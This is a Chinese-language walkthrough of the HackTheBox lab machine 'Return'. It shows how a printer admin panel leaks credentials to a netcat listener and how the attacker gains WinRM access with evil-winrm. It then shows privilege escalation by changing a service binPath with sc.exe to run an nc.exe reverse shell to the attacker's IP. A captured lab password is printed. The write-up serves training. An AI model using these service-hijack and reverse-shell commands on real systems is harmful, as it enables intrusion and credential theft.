Return黑客盒子演练

Return是HTB上的Windows机器,被评为简单,此框是在具有弱服务权限的窗口上设计的。如果总结一下,我们将滥用打印机管理门户通过netcat获取硬编码的凭据,并将其用于WinRM登录。打印机服务帐户是服务器操作员组的成员,该组允许停止和启动某些服务。因此,我们利用弱配置的服务来执行我们的恶意exe文件,滥用服务器操作员的权限。

原文链接:https://www.hackingarticles.in/return-hackthebox-walkthrough/

目录

初始访问

  • 列举
  • 凭据转储
  • 有效账户
  • 用户标志

权限提升

  • 滥用弱服务权限
  • 根滞后

让我们深入研究一下。

初始访问

首先,我们对机器的IP地址进行Nmap扫描,找到打开的端口,并观察到一些端口是打开的,从微软服务中我们了解了它的Windows操作系统。

nmap -sV -sC 10.129.31.220

列举

由于端口80是打开的,让我们尝试通过浏览器访问IP地址。

如您所见,我们可以访问打印机管理面板。这些页面正在运行 PHP。让我们导航到设置选项卡。

上面的设置向我们显示了svc打印机的用户名和已屏蔽的硬编码密码。服务器地址字段是唯一用作参数的字段,然后按下更新按钮。因此,打印机正在与端口 389 上的本地地址进行通信。

如果我们使用端口389将服务器地址替换为攻击机IP地址怎么办?

凭据转储

一旦我们从攻击者的IP(Kali Linux)中替换了服务器地址,我们就在kali机器上的端口389上启动了Netcat侦听器。

nc -lvp 389

点击更新按钮后,我们获得了密码“1edFg43012!”

WinRM 有效账户

让我们使用邪恶的 winrm 来建立远程连接。这可以通过发出以下命令来完成:


evil-winrm -i 10.129.31.219 -u svc-printer -p “1edFg43012!!”

我们可以访问服务器。让我们浏览到桌面目录,看看是否能找到任何标志。实际上,如上面的屏幕截图所示,我们可以找到用户.txt标志。

权限提升

现在,我们有权访问计算机,让我们验证我们拥有的用户权限或组。

为了验证这一点,我们发出命令 net user svc-printer

从下面的屏幕截图中,我们可以看到实际用户是服务器操作员组的成员。

具有服务器操作员组成员身份的用户可以执行哪些操作?

服务器操作员可以启动和停止服务。

服务器操作员组被视为服务管理员,可以更改域控制器上安装的二进制文件,从此处阅读更多内容

upload /usr/share/windows-binaries/nc.exe

因此,我们首先上传 nc.exe windows 二进制文件,然后枚举已安装的服务以进一步利用。

services

我们找到了已安装服务及其路径的列表,以及权限的真/假标志。

滥用弱服务权限

在这里,我们需要分析可以修改哪个二进制路径来执行nc.exe文件

首先,我们尝试窗口防御程序更改 WinDefend 的二进制路径,但收到访问被拒绝错误。

sc.exe config WinDefend binPath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234″

然后,我们尝试修改 VMTools 的二进制路径,最后这对我们有用。

sc.exe config VMTools binPath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234″

由于SVC打印机是服务器操作员的成员,因此我们可以重新启动服务以获得反向连接。因此,让我们通过发出以下命令来停止和启动服务 VMTools:

sc.exe stop VMTools

sc.exe start VMTools

在启动服务虚拟机工具之前,我们确保 netcat 正在侦听端口 1234,如下所示。

一旦服务停止并启动,我们就得到了netcat会话作为获取 Root 标志。

作者:Tirut Hawoldar是一位网络安全爱好者和CTF玩家,在IT安全和基础设施方面拥有15年的经验。可在LinkedIn联系

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

滚动至顶部